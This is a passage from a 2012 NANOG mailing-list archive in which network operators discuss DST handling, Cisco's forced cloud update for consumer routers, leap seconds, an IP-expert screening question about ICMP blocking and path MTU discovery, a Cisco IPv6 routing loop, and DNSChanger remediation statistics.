AZ actually tried DST for a year, and then came to a couple of conclusions:

1) The state with the highest insolation in the country really has no need to conserve daylight.

2) It actually wastes energy here by driving more business air conditioning use.

As for how it actually works: It's very simple. I never touch my clocks unless I'm setting or winding them. It's fantastic.

Where this falls down: Outlook will still attempt to scramble your calendar based on other people's silly clock change. Your phone will tell you it's updated the clock for DST...when it hasn't. Or worse, despite being set for no DST change, it'll do it. Some will even lock up.

There's lots and lots of broken time of day code out there. People don't understand the distinction between, say, Mountain Standard Time, and Mountain Daylight Time (Equinix, I'm looking at *YOU* -- your MST setting in the portal is not, in fact, MST. There's no option appropriate for me at all.) Everyone keeps asking you what time it is 'there' because they can't wrap their brains around a static -7 offset.

Anyway, given the number of software bugs around the DST change, the leap is the least of our worries. Perhaps we should stop rewarding people that write bad code.
--msa

From jgreco at ns.sol.net Thu Jul 5 13:07:14 2012
From: jgreco at ns.sol.net (Joe Greco)
Date: Thu, 5 Jul 2012 13:07:14 -0500 (CDT)
Subject: Cisco Update
In-Reply-To:
Message-ID: <201207051807.q65I7EQo081653@aurora.sol.net>

> Technical users could always just flash DD-WRT onto the device and
> replace the Linksys/Cisco firmware; then you have a much more robust
> system without any big brother stuff.

Or Cisco could just omit the big brother stuff.

This is not a technological failure. In fact, automatic updates of router firmware are overdue. Good job on that front.

It is the implications of your router dictating to you what sort of uses might be acceptable and what is not that's troubling, and that seems to have happened on several levels in this product.

... JG
--
Joe Greco - sol.net Network Services - Milwaukee, WI - http://www.sol.net
"We call it the 'one bite at the apple' rule. Give me one chance [and] then I won't contact you again." - Direct Marketing Ass'n position on e-mail spam(CNN)
With 24 million small businesses in the US alone, that's way too many apples.

From jj at diamondtech.ca Thu Jul 5 14:24:58 2012
From: jj at diamondtech.ca (Jeff Johnstone)
Date: Thu, 5 Jul 2012 12:24:58 -0700
Subject: Cisco Update
In-Reply-To: <201207051807.q65I7EQo081653@aurora.sol.net>
References: <201207051807.q65I7EQo081653@aurora.sol.net>
Message-ID:

On Thu, Jul 5, 2012 at 11:07 AM, Joe Greco wrote:
> > Technical users could always just flash DD-WRT onto the device and
> > replace the Linksys/Cisco firmware; then you have a much more robust
> > system without any big brother stuff.
>
> Or Cisco could just omit the big brother stuff.
>
> This is not a technological failure. In fact, automatic updates of
> router firmware are overdue. Good job on that front.
>
> It is the implications of your router dictating to you what sort of
> uses might be acceptable and what is not that's troubling, and that
> seems to have happened on several levels in this product.
>
> ... JG
>

This is what has me thinking about shorting Cisco stock. When the legal implications of this hit the FCC, EFF, or here in Canada the CRTC, the shouts will begin.

This breaks all sorts of regulations about privacy and I'm sure a few other product sales laws in the different countries where the products are sold.

Interesting times we live in....

cheers
Jeff

From eugen at leitl.org Thu Jul 5 14:32:00 2012
From: eugen at leitl.org (Eugen Leitl)
Date: Thu, 5 Jul 2012 21:32:00 +0200
Subject: F-ckin Leap Seconds, how do they work?
In-Reply-To: <4FF5CE3E.6060603@gmail.com>
References: <4FF5CE3E.6060603@gmail.com>
Message-ID: <20120705193200.GY12615@leitl.org>

On Thu, Jul 05, 2012 at 10:26:22AM -0700, Roy wrote:
> Remember OpenTime is only for people who want their system clocks to
> ignore leap seconds. I don't include myself among the possible users of
> OpenTime.

Obviously you need a machine time, which is monotonous, high-resolution (you don't need too many bits even if you resolve down to Planck time and gigayears) and works on any planetary body or in space at any speed, and a human time, which is dynamically derived from machine time, using algorithms depending on particular location and occasion.

The sooner we can separate the machine time from people time, the better.

From dr at cluenet.de Thu Jul 5 14:39:02 2012
From: dr at cluenet.de (Daniel Roesen)
Date: Thu, 5 Jul 2012 21:39:02 +0200
Subject: job screening question
In-Reply-To:
References:
Message-ID: <20120705193902.GB23660@srv03.cluenet.de>

On Thu, Jul 05, 2012 at 01:45:54PM -0400, Derek Ivey wrote:
> This is exactly the issue comcast6.net is currently experiencing :).
> They seem to be blocking ICMP completely and that is causing my HE
> IPv6 tunnel to be unable to access their site from a browser.

I've recently come across a dualstacked website which fails behind a SixXS tunnel (MTU=1280) but works fine with a native connection (MTU=1500).
Having contacted their technical staff, we have diagnosed the issue down to the dualstacked load balancer (pretty well-known brand) SOMETIMES not reacting on ICMPv6 PTB errors.

It's not always as easy as "blocks all ICMPv6". For all the cases I've hunted down to root cause in the last decade, it was never a firewall blocking ICMPv6, but most times misbehaving load balancers, either due to bugs or plain not having implemented PMTUD on IPv6.

Best regards,
Daniel

--
CLUE-RIPE -- Jabber: dr at cluenet.de -- dr at IRCnet -- PGP: 0xA85C8AA0

From tnadeau at lucidvision.com Thu Jul 5 14:46:39 2012
From: tnadeau at lucidvision.com (Thomas D Nadeau)
Date: Thu, 5 Jul 2012 15:46:39 -0400
Subject: Cisco Update
In-Reply-To: <24E0AC20-73D9-4E53-B5F3-86F46E0A03D5@charterschoolit.com>
References: <24E0AC20-73D9-4E53-B5F3-86F46E0A03D5@charterschoolit.com>
Message-ID:

dd-wrt or openwrt are your friend on those devices. 8)

On Jul 5, 2012, at 11:51 AM, Mario Eirea wrote:
> Has anyone seen this yet? Looks like Cisco was forcing people to join its Cloud service through an update for its consumer level routers.
>
> http://www.neowin.net/news/cisco-locks-users-out-of-their-routers-requires-invasive-cloud-service
>
> -Mario Eirea

From rps at maine.edu Thu Jul 5 14:49:01 2012
From: rps at maine.edu (Ray Soucy)
Date: Thu, 5 Jul 2012 15:49:01 -0400
Subject: Cisco Update
In-Reply-To:
References: <201207051807.q65I7EQo081653@aurora.sol.net>
Message-ID:

Looks like they've modified their privacy policy in the last few days, but from what I understand it was originally pretty bad, including collecting users' history and:

[...] right to shut down the users' account if it finds that they have used the service for "obscene, pornographic, or offensive purposes, to infringe another's rights, including but not limited to any intellectual property rights, or
to violate, or encourage any conduct that would violate any applicable law or regulation or give rise to civil or criminal liability," as well as comply with the orders it receives by "a third party or court of competent jurisdiction" if the user has been found violating those terms. [...]

I haven't really kept up on consumer-grade networking; who out there presents a reasonable challenge to Cisco these days?

On Thu, Jul 5, 2012 at 3:24 PM, Jeff Johnstone wrote:
> On Thu, Jul 5, 2012 at 11:07 AM, Joe Greco wrote:
>
>> > Technical users could always just flash DD-WRT onto the device and
>> > replace the Linksys/Cisco firmware; then you have a much more robust
>> > system without any big brother stuff.
>>
>> Or Cisco could just omit the big brother stuff.
>>
>> This is not a technological failure. In fact, automatic updates of
>> router firmware are overdue. Good job on that front.
>>
>> It is the implications of your router dictating to you what sort of
>> uses might be acceptable and what is not that's troubling, and that
>> seems to have happened on several levels in this product.
>>
>> ... JG
>>
>
> This is what has me thinking about shorting Cisco stock. When the legal
> implications of this hit the FCC,
> EFF,
> or here in Canada the CRTC, the shouts will begin.
> This breaks all sorts of regulations about privacy and I'm sure a few other
> product sales laws in the different countries where the products are sold.
> Interesting times we live in....
>
> cheers
> Jeff

--
Ray Soucy
Epic Communications Specialist
Phone: +1 (207) 561-3526
Networkmaine, a Unit of the University of Maine System
http://www.networkmaine.net/

From terry.baranski.list at gmail.com Thu Jul 5 15:04:25 2012
From: terry.baranski.list at gmail.com (Terry Baranski)
Date: Thu, 5 Jul 2012 16:04:25 -0400
Subject: job screening question
In-Reply-To:
References:
Message-ID: <4ff5f350.87b7e00a.1f02.ffffa840@mx.google.com>

On Thu, Jul 5, 2012 at 1:42 PM, William Herrin wrote:
> No, path MTU discovery is the answer I'm fishing for.

The "TCP specifically" part of the question confused the heck out of me. PMTUD is an IP function in every way as far as I'm concerned. (If you're saying that the way it's actually coded makes it more like a TCP function, I'd still change the wording unless you're hiring people to write network drivers.)

-Terry

From rps at maine.edu Thu Jul 5 15:40:20 2012
From: rps at maine.edu (Ray Soucy)
Date: Thu, 5 Jul 2012 16:40:20 -0400
Subject: job screening question
In-Reply-To:
References:
Message-ID:

I think if your goal is to see if they know that you shouldn't blindly filter ICMP for IPv6, and you're specifically looking for knowledge of PMTUD, then a better question would be "Please list the problems that could occur if all ICMPv6 traffic is blocked between two host systems."

Which should get you a minimum of neighbor discovery, and up into PMTUD for those who have some knowledge on the subject.

If you just say ICMP your answers will be all over the place since blocking of ICMP outright for endpoints is rampant today in the IPv4 world. They might even know the answer but not think of it because of the lack of context.

I generally try to stay away from any question that has a definitive answer, as that will only tell you if they happened to read and retain that piece of information somewhere along the way.
In my experience, people who have an "OK" understanding of Layer-3 might not always have a good understanding of what happens below that.

A better approach might be to have an open ended question that asks them to describe what events will take place for a pair of host systems to communicate in as much detail as they can. If you're asking the question you can leave it intentionally vague and use the questions they ask to evaluate their ability to work through problems; if it needs to be asked by HR then you can narrow it down to include more detail.

A good applicant should be able to explain the ARP process at a minimum. If they can't, they have no business being in networking in a question like this. I know it sounds trivial, but you'd be surprised how many "experts" I've met who go blank at a question like this.

Even more telling than a correct answer is an incorrect answer. I'm always on the look-out for IT people who like to make stuff up; I have no tolerance for that.

On Thu, Jul 5, 2012 at 1:02 PM, William Herrin wrote:
> Hi folks,
>
> I gave my HR folks a screening question to ask candidates for an IP
> expert position. I've gotten some "unexpected" answers, so I want to
> do a sanity check and make sure I'm not asking something unreasonable.
> And by "unexpected" I don't mean naively incorrect answers, I mean
> oh-my-God-how-did-you-get-that-cisco-certification answers.
>
> The question was:
>
> You implement a firewall on which you block all ICMP packets. What
> part of the TCP protocol (not IP in general, TCP specifically)
> malfunctions as a result?
>
>
> My questions for you are:
>
> 1. As an expert who follows NANOG, do you know the answer? Or is this
> question too hard?
>
> 2. Is the question too vague? Is there a clearer way to word it?
>
> 3. Is there a better screening question I could pass to HR to ask and
> check the candidate's response against the supplied answer?
>
> Thanks,
> Bill Herrin
>
>
> --
> William D. Herrin ................
herrin at dirtside.com bill at herrin.us
> 3005 Crane Dr. ...................... Web:
> Falls Church, VA 22042-3004
>

--
Ray Soucy
Epic Communications Specialist
Phone: +1 (207) 561-3526
Networkmaine, a Unit of the University of Maine System
http://www.networkmaine.net/

From rps at maine.edu Thu Jul 5 15:45:54 2012
From: rps at maine.edu (Ray Soucy)
Date: Thu, 5 Jul 2012 16:45:54 -0400
Subject: job screening question
In-Reply-To: <4ff5f350.87b7e00a.1f02.ffffa840@mx.google.com>
References: <4ff5f350.87b7e00a.1f02.ffffa840@mx.google.com>
Message-ID:

He might be thinking of the MSS adjustment as a result of PMTUD, which most people forget about BTW, but I agree: PMTUD isn't about TCP, so tossing TCP in there just makes it a very odd question.

On Thu, Jul 5, 2012 at 4:04 PM, Terry Baranski wrote:
> On Thu, Jul 5, 2012 at 1:42 PM, William Herrin wrote:
>
>> No, path MTU discovery is the answer I'm fishing for.
>
> The "TCP specifically" part of the question confused the heck out of me.
> PMTUD is an IP function in every way as far as I'm concerned. (If you're
> saying that the way it's actually coded makes it more like a TCP function,
> I'd still change the wording unless you're hiring people to write network
> drivers.)
>
> -Terry
>
>

--
Ray Soucy
Epic Communications Specialist
Phone: +1 (207) 561-3526
Networkmaine, a Unit of the University of Maine System
http://www.networkmaine.net/

From andriy.bilous at gmail.com Thu Jul 5 15:57:34 2012
From: andriy.bilous at gmail.com (Andriy Bilous)
Date: Thu, 5 Jul 2012 22:57:34 +0200
Subject: Cisco Update
In-Reply-To:
References: <201207051807.q65I7EQo081653@aurora.sol.net>
Message-ID:

I suspect it'll be "Corporations control Internet and our private life" well before tomorrow. Domestic operators have done that for ages with their branded routers and AFAIK DOCSIS is unimaginable without (part of) this functionality.
I went berserk when I discovered such a checkbox in my home router; two days later I checked it on again and never looked back. How often do I check for firmware upgrades for my home router? Almost never. Do I backup my config? No. Do I disassemble the binary blob before upgrade? No. And I consider myself an above-average Internet user. It doesn't really matter how I brick my hardware, and implementing authentication on the vendor site to download the firmware does a better job with gathering sensitive data honestly. Automatic updates are pretty much a common feature these days; it's good to know what it means for a user but is hardly game-breaking.

From Derek.Andrew at usask.ca Thu Jul 5 16:05:01 2012
From: Derek.Andrew at usask.ca (Derek Andrew)
Date: Thu, 5 Jul 2012 15:05:01 -0600
Subject: job screening question
In-Reply-To:
References:
Message-ID:

Isn't MTU discovery on IP and not TCP?

On Thu, Jul 5, 2012 at 11:11 AM, Oliver Garraux wrote:
> Seems fairly straightforward to me. It'll break path MTU discovery.
>
> I would hope someone applying for an "IP expert" position would know that.
>
> Could HR be mangling the question or something?
>
> Oliver
>
> -------------------------------------
>
> Oliver Garraux
> Check out my blog: www.GetSimpliciti.com/blog
> Follow me on Twitter: twitter.com/olivergarraux
>
>
> On Thu, Jul 5, 2012 at 1:02 PM, William Herrin wrote:
> > Hi folks,
> >
> > I gave my HR folks a screening question to ask candidates for an IP
> > expert position. I've gotten some "unexpected" answers, so I want to
> > do a sanity check and make sure I'm not asking something unreasonable.
> > And by "unexpected" I don't mean naively incorrect answers, I mean
> > oh-my-God-how-did-you-get-that-cisco-certification answers.
> >
> > The question was:
> >
> > You implement a firewall on which you block all ICMP packets.
What
> > part of the TCP protocol (not IP in general, TCP specifically)
> > malfunctions as a result?
> >
> >
> > My questions for you are:
> >
> > 1. As an expert who follows NANOG, do you know the answer? Or is this
> > question too hard?
> >
> > 2. Is the question too vague? Is there a clearer way to word it?
> >
> > 3. Is there a better screening question I could pass to HR to ask and
> > check the candidate's response against the supplied answer?
> >
> > Thanks,
> > Bill Herrin
> >
> >
> > --
> > William D. Herrin ................ herrin at dirtside.com bill at herrin.us
> > 3005 Crane Dr. ...................... Web:
> > Falls Church, VA 22042-3004
> >
> >

--
Copyright 2012 Derek Andrew (excluding quotations)
+1 306 966 4808
ICT
University of Saskatchewan
Peterson 120; 105 North Road
Saskatoon, Saskatchewan, Canada. S7N 4L5
Timezone GMT-6
Typed but not read.

From surfer at mauigateway.com Thu Jul 5 16:12:43 2012
From: surfer at mauigateway.com (Scott Weeks)
Date: Thu, 5 Jul 2012 14:12:43 -0700
Subject: job screening question
Message-ID: <20120705141243.EEE1F71D@resin13.mta.everyone.net>

--------------------------------------
Cc: "nanog at nanog.org"
Subject: Re: job screening question
Date: Thu, 5 Jul 2012 15:05:01 -0600

Isn't MTU discovery on IP and not TCP?
--------------------------------------

https://en.wikipedia.org/wiki/Path_MTU_discovery

scott

From frnkblk at iname.com Thu Jul 5 16:21:12 2012
From: frnkblk at iname.com (Frank Bulk)
Date: Thu, 5 Jul 2012 16:21:12 -0500
Subject: cisco.com's IPv6 sites have a routing loop
Message-ID: <00c901cd5af4$1a800510$4f800f30$@iname.com>

Two of Cisco's IPv6 sites, www-v6.cisco.com and www.ipv6.cisco.com, are in a routing loop:

13 10gigabitethernet11-4.core1.sjc2.he.net (2001:470:0:1b4::1) 84.519 ms 82.710 ms 81.033 ms
14 10gigabitethernet3-2.core1.pao1.he.net (2001:470:0:32::2) 81.821 ms 81.826 ms 83.413 ms
15 ciscosystems.v403.core1.pao1.he.net (2001:470:0:1ee::2) 86.730 ms 86.694 ms 110.206 ms
16 sjck-dmzbba-gw1-v6-g1-2.cisco.com (2001:420:80:6:c67d:4fff:fe8b:e2c0) 88.269 ms 88.128 ms 88.067 ms
17 sjck-ispa-gw1-v6-g0-0-2.cisco.com (2001:420:80:6:ca4c:75ff:fe34:7482) 111.224 ms 87.687 ms 87.867 ms
18 sjck-dmzbba-gw1-v6-g1-2.cisco.com (2001:420:80:6:c67d:4fff:fe8b:e2c0) 88.117 ms 87.956 ms 88.234 ms
19 sjck-ispa-gw1-v6-g0-0-2.cisco.com (2001:420:80:6:ca4c:75ff:fe34:7482) 87.879 ms 87.804 ms 103.848 ms
20 sjck-dmzbba-gw1-v6-g1-2.cisco.com (2001:420:80:6:c67d:4fff:fe8b:e2c0) 88.339 ms 88.367 ms 88.574 ms
...

noc at cisco.com doesn't work and I can't seem to find any of Cisco's NOC-related email addresses in any list that I have. Hopefully someone from Cisco is lurking.

Frank Bulk

From andrew.fried at gmail.com Thu Jul 5 16:26:08 2012
From: andrew.fried at gmail.com (Andrew Fried)
Date: Thu, 05 Jul 2012 17:26:08 -0400
Subject: Domain changer statistics by ASN
Message-ID: <4FF60670.4010404@gmail.com>

As many of you probably know, the replacement nameservers operated on behalf of the FBI for the Domain Changer Working Group (DCWG) are scheduled to go down Sunday morning (GMT).

Yesterday, July 4th, was a holiday in the US, and as such the US based activity hitting the DCWG nameservers was uncharacteristically low. The numbers seen in the rest of the world were normal.
I'm attaching a report that shows the number of unique ip addresses that were seen hitting the DCWG nameservers from the 4th based on ASN. If you control one of the ASNs seen in the list please remind your folks that these numbers need to come down by Sunday.

If you find this of use, I can regenerate new reports later this afternoon with data from the 5th.

Andy

--
Andrew Fried
andrew.fried at gmail.com

-------------- next part --------------
A non-text attachment was scrubbed...
Name: dcwg-asns-20120704.txt.bz2
Type: application/x-bzip2
Size: 17851 bytes
Desc: not available
URL:

From EWieling at nyigc.com Thu Jul 5 16:42:01 2012
From: EWieling at nyigc.com (Eric Wieling)
Date: Thu, 5 Jul 2012 17:42:01 -0400
Subject: Domain changer statistics by ASN
In-Reply-To: <4FF60670.4010404@gmail.com>
References: <4FF60670.4010404@gmail.com>
Message-ID:

A report for a day other than the 4th of July would be very helpful.

-----Original Message-----
From: Andrew Fried [mailto:andrew.fried at gmail.com]
Sent: Thursday, July 05, 2012 5:26 PM
To: nanog at nanog.org
Subject: Domain changer statistics by ASN

As many of you probably know, the replacement nameservers operated on behalf of the FBI for the Domain Changer Working Group (DCWG) are scheduled to go down Sunday morning (GMT).

Yesterday, July 4th, was a holiday in the US, and as such the US based activity hitting the DCWG nameservers was uncharacteristically low. The numbers seen in the rest of the world were normal.

I'm attaching a report that shows the number of unique ip addresses that were seen hitting the DCWG nameservers from the 4th based on ASN. If you control one of the ASNs seen in the list please remind your folks that these numbers need to come down by Sunday.

If you find this of use, I can regenerate new reports later this afternoon with data from the 5th.
Andy

--
Andrew Fried
andrew.fried at gmail.com

From andrew.fried at gmail.com Thu Jul 5 16:45:23 2012
From: andrew.fried at gmail.com (Andrew Fried)
Date: Thu, 05 Jul 2012 17:45:23 -0400
Subject: Domain changer statistics by ASN
In-Reply-To:
References: <4FF60670.4010404@gmail.com>
Message-ID: <4FF60AF3.6020405@gmail.com>

We have data going back to November 8, 2011. Generating a report of over 2,000 ASNs, by day, would be too large an attachment for NANOG.

I'll produce a follow up report in less than 3 hours with data from July 5th. Would that help?

Andy

Andrew Fried
andrew.fried at gmail.com

On 7/5/12 5:42 PM, Eric Wieling wrote:
> A report for a day other than the 4th of July would be very helpful.
>
> -----Original Message-----
> From: Andrew Fried [mailto:andrew.fried at gmail.com]
> Sent: Thursday, July 05, 2012 5:26 PM
> To: nanog at nanog.org
> Subject: Domain changer statistics by ASN
>
> As many of you probably know, the replacement nameservers operated on behalf of the FBI for the Domain Changer Working Group (DCWG) are scheduled to go down Sunday morning (GMT).
>
> Yesterday, July 4th, was a holiday in the US, and as such the US based activity hitting the DCWG nameservers was uncharacteristically low. The numbers seen in the rest of the world were normal.
>
> I'm attaching a report that shows the number of unique ip addresses that were seen hitting the DCWG nameservers from the 4th based on ASN. If you control one of the ASNs seen in the list please remind your folks that these numbers need to come down by Sunday.
>
> If you find this of use, I can regenerate new reports later this afternoon with data from the 5th.
>
> Andy
>
> --
> Andrew Fried
> andrew.fried at gmail.com
>
>

From javier at kjsl.org Thu Jul 5 16:48:16 2012
From: javier at kjsl.org (Javier Henderson)
Date: Thu, 5 Jul 2012 17:48:16 -0400
Subject: cisco.com's IPv6 sites have a routing loop
In-Reply-To: <00c901cd5af4$1a800510$4f800f30$@iname.com>
References: <00c901cd5af4$1a800510$4f800f30$@iname.com>
Message-ID: <62A6ED79-40D7-4A17-B2E3-4E45906274A9@kjsl.org>

On Jul 5, 2012, at 5:21 PM, Frank Bulk wrote:
> Two of Cisco's IPv6 sites, www-v6.cisco.com and www.ipv6.cisco.com, are in a
> routing loop:
>
> 13 10gigabitethernet11-4.core1.sjc2.he.net (2001:470:0:1b4::1) 84.519 ms
> 82.710 ms 81.033 ms
> 14 10gigabitethernet3-2.core1.pao1.he.net (2001:470:0:32::2) 81.821 ms
> 81.826 ms 83.413 ms
> 15 ciscosystems.v403.core1.pao1.he.net (2001:470:0:1ee::2) 86.730 ms
> 86.694 ms 110.206 ms
> 16 sjck-dmzbba-gw1-v6-g1-2.cisco.com (2001:420:80:6:c67d:4fff:fe8b:e2c0)
> 88.269 ms 88.128 ms 88.067 ms
> 17 sjck-ispa-gw1-v6-g0-0-2.cisco.com (2001:420:80:6:ca4c:75ff:fe34:7482)
> 111.224 ms 87.687 ms 87.867 ms
> 18 sjck-dmzbba-gw1-v6-g1-2.cisco.com (2001:420:80:6:c67d:4fff:fe8b:e2c0)
> 88.117 ms 87.956 ms 88.234 ms
> 19 sjck-ispa-gw1-v6-g0-0-2.cisco.com (2001:420:80:6:ca4c:75ff:fe34:7482)
> 87.879 ms 87.804 ms 103.848 ms
> 20 sjck-dmzbba-gw1-v6-g1-2.cisco.com (2001:420:80:6:c67d:4fff:fe8b:e2c0)
> 88.339 ms 88.367 ms 88.574 ms
> ...
>
> noc at cisco.com doesn't work and I can't seem to find any of Cisco's NOC-related
> email addresses in any list that I have. Hopefully someone from Cisco is
> lurking.

I am, and I passed that along to The Management.

-jav

From bill at herrin.us Thu Jul 5 17:18:23 2012
From: bill at herrin.us (William Herrin)
Date: Thu, 5 Jul 2012 18:18:23 -0400
Subject: job screening question
In-Reply-To:
References:
Message-ID:

On Thu, Jul 5, 2012 at 5:05 PM, Derek Andrew wrote:
>> > You implement a firewall on which you block all ICMP packets.
What
>> > part of the TCP protocol (not IP in general, TCP specifically)
>> > malfunctions as a result?
>
> Isn't MTU discovery on IP and not TCP?

If you want to overthink the question, the failure in the TCP protocol is that it doesn't adjust the MSS to match the path MTU. It continues to rely on the incorrect path MTU estimate, sending too-large packets which will never arrive. This happens because TCP doesn't receive a notification that the path MTU estimate has changed from the default because the lower layer PMTUD algorithm never receives the expected ICMP packet.

This, incidentally, is a detail I'd love for one of the candidates to offer in response to that question. Bonus points if you discuss MSS clamping and RFC 4821.

The less precise answer, path MTU discovery breaks, is just fine.

Regards,
Bill Herrin

--
William D. Herrin ................ herrin at dirtside.com bill at herrin.us
3005 Crane Dr. ...................... Web:
Falls Church, VA 22042-3004

From EWieling at nyigc.com Thu Jul 5 17:26:16 2012
From: EWieling at nyigc.com (Eric Wieling)
Date: Thu, 5 Jul 2012 18:26:16 -0400
Subject: Domain changer statistics by ASN
In-Reply-To: <4FF60AF3.6020405@gmail.com>
References: <4FF60670.4010404@gmail.com> <4FF60AF3.6020405@gmail.com>
Message-ID:

July 2nd might be the most accurate. For our customers, July 3rd, 4th, and today have been low volume days because of the holiday. I suspect the same is true for many providers in the USA.

-----Original Message-----
From: Andrew Fried [mailto:andrew.fried at gmail.com]
Sent: Thursday, July 05, 2012 5:45 PM
To: Eric Wieling
Cc: nanog at nanog.org
Subject: Re: Domain changer statistics by ASN

We have data going back to November 8, 2011. Generating a report of over 2,000 ASNs, by day, would be too large an attachment for NANOG.

I'll produce a follow up report in less than 3 hours with data from July 5th. Would that help?
Andy

Andrew Fried
andrew.fried at gmail.com

On 7/5/12 5:42 PM, Eric Wieling wrote:
> A report for a day other than the 4th of July would be very helpful.
>
> -----Original Message-----
> From: Andrew Fried [mailto:andrew.fried at gmail.com]
> Sent: Thursday, July 05, 2012 5:26 PM
> To: nanog at nanog.org
> Subject: Domain changer statistics by ASN
>
> As many of you probably know, the replacement nameservers operated on behalf of the FBI for the Domain Changer Working Group (DCWG) are scheduled to go down Sunday morning (GMT).
>
> Yesterday, July 4th, was a holiday in the US, and as such the US based activity hitting the DCWG nameservers was uncharacteristically low. The numbers seen in the rest of the world were normal.
>
> I'm attaching a report that shows the number of unique ip addresses that were seen hitting the DCWG nameservers from the 4th based on ASN. If you control one of the ASNs seen in the list please remind your folks that these numbers need to come down by Sunday.
>
> If you find this of use, I can regenerate new reports later this afternoon with data from the 5th.
>
> Andy
>
> --
> Andrew Fried
> andrew.fried at gmail.com
>
>

From frnkblk at iname.com Thu Jul 5 17:29:32 2012
From: frnkblk at iname.com (Frank Bulk)
Date: Thu, 5 Jul 2012 17:29:32 -0500
Subject: Domain changer statistics by ASN
In-Reply-To: <4FF60670.4010404@gmail.com>
References: <4FF60670.4010404@gmail.com>
Message-ID: <00db01cd5afd$a65f46a0$f31dd3e0$@iname.com>

Yeah, I see the singular one for our AS. =) We've known it for some time, but the older lady is somewhat reluctant to spend money on getting someone to look at it. I spoke to her today and she has two machines, one new, one old. She's going to turn the old one off and hope that we won't see any more Shadowserver reports for it.
Frank

-----Original Message-----
From: Andrew Fried [mailto:andrew.fried at gmail.com]
Sent: Thursday, July 05, 2012 4:26 PM
To: nanog at nanog.org
Subject: Domain changer statistics by ASN

As many of you probably know, the replacement nameservers operated on behalf of the FBI for the Domain Changer Working Group (DCWG) are scheduled to go down Sunday morning (GMT).

Yesterday, July 4th, was a holiday in the US, and as such the US based activity hitting the DCWG nameservers was uncharacteristically low. The numbers seen in the rest of the world were normal.

I'm attaching a report that shows the number of unique ip addresses that were seen hitting the DCWG nameservers from the 4th based on ASN. If you control one of the ASNs seen in the list please remind your folks that these numbers need to come down by Sunday.

If you find this of use, I can regenerate new reports later this afternoon with data from the 5th.

Andy

--
Andrew Fried
andrew.fried at gmail.com

From randy_94108 at yahoo.com Thu Jul 5 18:01:49 2012
From: randy_94108 at yahoo.com (Randy)
Date: Thu, 5 Jul 2012 16:01:49 -0700 (PDT)
Subject: job screening question
In-Reply-To:
Message-ID: <1341529309.22035.YahooMailClassic@web181114.mail.ne1.yahoo.com>

--- On Thu, 7/5/12, William Herrin wrote:
> From: William Herrin
> Subject: Re: job screening question
> To: "Derek Andrew"
> Cc: "nanog at nanog.org"
> Date: Thursday, July 5, 2012, 3:18 PM
> On Thu, Jul 5, 2012 at 5:05 PM, Derek
> Andrew
> wrote:
> >> > You implement a firewall on which you block
> all ICMP packets. What
> >> > part of the TCP protocol (not IP in general,
> TCP specifically)
> >> > malfunctions as a result?
> >
> > Isn't MTU discovery on IP and not TCP?
>
> If you want to overthink the question, the failure in the
> TCP protocol
> is that it doesn't adjust the MSS to match the path MTU. It
> continues
> to rely on the incorrect path MTU estimate, sending
> too-large packets
> which will never arrive.
> This happens because TCP doesn't
> receive a
> notification that the path MTU estimate has changed from the
> default
> because the lower layer PMTUD algorithm never receives the
> expected
> ICMP packet.
>
> This, incidentally, is a detail I'd love for one of the
> candidates
> to offer in response to that question. Bonus points if you
> discuss MSS
> clamping and RFC 4821.
>
> The less precise answer, path MTU discovery breaks, is just
> fine.
>
> Regards,
> Bill Herrin

Precisely! And if I understand correctly, a non-technical person within HR is expected to hear this answer and relay it to you? That is more than a long shot. Unless of course they have photographic memories, are great typists or perhaps do "short hand".

./Randy

From diogo.montagner at gmail.com Thu Jul 5 18:20:12 2012
From: diogo.montagner at gmail.com (Diogo Montagner)
Date: Fri, 6 Jul 2012 07:20:12 +0800
Subject: job screening question
In-Reply-To:
References:
Message-ID:

This type of question, where the candidate can elaborate the answer, should be asked by a technical interviewer.

For screening questions (for 1st level filtering), IMO, the questions have to be straight to the point, for example:

1) What is the LSA number for an external route in OSPF?

This can have two answers: 5 or 7. So, I will accept if the candidate answers 5, 7, or 5 and 7. Later on (the next level of the interview), a technical interviewer will check if the candidate understands the differences between LSA 5 and 7.

The point is that the candidate cannot deviate from the question, i.e., this question will not generate another question from the candidate to the interviewer asking for more details about the scenario in case.

For example, you may ask: which IGP is more reliable under an IP DoS attack? The answer for this question can be very long or may require some sort of interaction between the candidate and the interviewer, which means it has to be asked by technical people and not by non-technical interviewers.
Thanks

On 7/6/12, William Herrin wrote:
> Hi folks,
>
> I gave my HR folks a screening question to ask candidates for an IP
> expert position. I've gotten some "unexpected" answers, so I want to
> do a sanity check and make sure I'm not asking something unreasonable.
> And by "unexpected" I don't mean naively incorrect answers, I mean
> oh-my-God-how-did-you-get-that-cisco-certification answers.
>
> The question was:
>
> You implement a firewall on which you block all ICMP packets. What
> part of the TCP protocol (not IP in general, TCP specifically)
> malfunctions as a result?
>
>
> My questions for you are:
>
> 1. As an expert who follows NANOG, do you know the answer? Or is this
> question too hard?
>
> 2. Is the question too vague? Is there a clearer way to word it?
>
> 3. Is there a better screening question I could pass to HR to ask and
> check the candidate's response against the supplied answer?
>
> Thanks,
> Bill Herrin
>
>
> --
> William D. Herrin ................ herrin at dirtside.com bill at herrin.us
> 3005 Crane Dr. ...................... Web:
> Falls Church, VA 22042-3004
>
>

--
Sent from my mobile device

./diogo -montagner
JNCIE-M 0x41A

From surfer at mauigateway.com Thu Jul 5 18:48:36 2012
From: surfer at mauigateway.com (Scott Weeks)
Date: Thu, 5 Jul 2012 16:48:36 -0700
Subject: job screening question
Message-ID: <20120705164836.EEEE1921@resin13.mta.everyone.net>

--- diogo.montagner at gmail.com wrote:
From: Diogo Montagner

For screening questions (for 1st level filtering), IMO, the questions
have to be straight to the point, for example:

1) What is the LSA number for an external route in OSPF?

This can have two answers: 5 or 7. So, I will accept if the candidate
answers 5, 7 or 5 and 7. Later on (the next level of the interview), a
technical interviewer will check if the candidate understands the
differences of LSA 5 and 7.
-----------------------------------------------------------


How often do you use this in everyday netgeeking?
Asking these types of questions will assure that you get someone with a vendor i-drank-the-kool-aid cert because they memorized the answers, but maybe not the best candidate for the position. However, with some of today's managers kool-aid certs are looked on as better than an engineering degree. Go figure... :-(

scott

From jason at thebaughers.com Thu Jul 5 18:51:34 2012
From: jason at thebaughers.com (Jason Baugher)
Date: Thu, 05 Jul 2012 18:51:34 -0500
Subject: job screening question
In-Reply-To:
References:
Message-ID: <4FF62886.5070607@thebaughers.com>

Geez, I'd be happy to find someone with a good attitude, a solid work ethic, and the desire and aptitude to learn. :)

Jason

On 7/5/2012 5:18 PM, William Herrin wrote:
> On Thu, Jul 5, 2012 at 5:05 PM, Derek Andrew wrote:
>>>> You implement a firewall on which you block all ICMP packets. What
